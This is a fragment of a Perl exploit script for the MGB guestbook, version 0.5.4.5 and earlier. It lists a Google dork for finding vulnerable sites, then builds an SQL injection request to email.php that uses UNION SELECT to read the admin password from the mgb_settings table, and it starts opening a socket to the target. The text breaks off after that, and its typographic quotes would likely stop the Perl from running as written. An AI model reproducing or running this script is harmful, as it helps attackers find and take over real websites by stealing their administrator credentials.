#!/usr/bin/perl
#
##########################################################
# MGB <= 0.5.4.5 Exploit # Vulnerability
##########################################################
# Google dork:
# ( intext:mgb.0.5.. & intext:mopzz ) | intext:mgb.0.5.4..
##########################################################
use IO::Socket::INET;
usage() unless (@ARGV == 2);
$host = $ARGV[0];
$dir = $ARGV[1];
$dir = “\/$dir” if ($dir !~ /^\//);
$dir = “$dir\/” if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;
$path = $dir.’email.php?id=
1%20UNION%20SELECT%20null,passwort%20FROM%20mgb_settings%20–’;
$socket = IO::Socket::INET->new( Proto => “tcp”,
[…]